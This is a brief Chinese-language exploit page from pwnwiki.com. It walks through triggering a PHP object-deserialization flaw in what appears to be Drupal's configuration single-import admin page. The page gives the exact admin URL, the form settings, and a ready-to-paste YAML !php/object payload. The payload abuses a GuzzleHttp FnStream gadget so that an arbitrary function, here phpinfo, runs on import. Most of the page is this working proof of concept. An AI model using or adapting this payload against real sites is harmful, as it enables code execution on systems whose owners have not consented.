pwnwiki.com
,
漏洞利用
登录管理员账户,访问以下URL:
http://127.0.0.1/admin/config/development/configuration/single/import
Configuration type
选择为Simple configuration
Configuration name
可以随便填写,在Paste your configuration here
中写入poc:
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
点击左下角的Import按钮便可以触发漏洞。
pwnwiki.com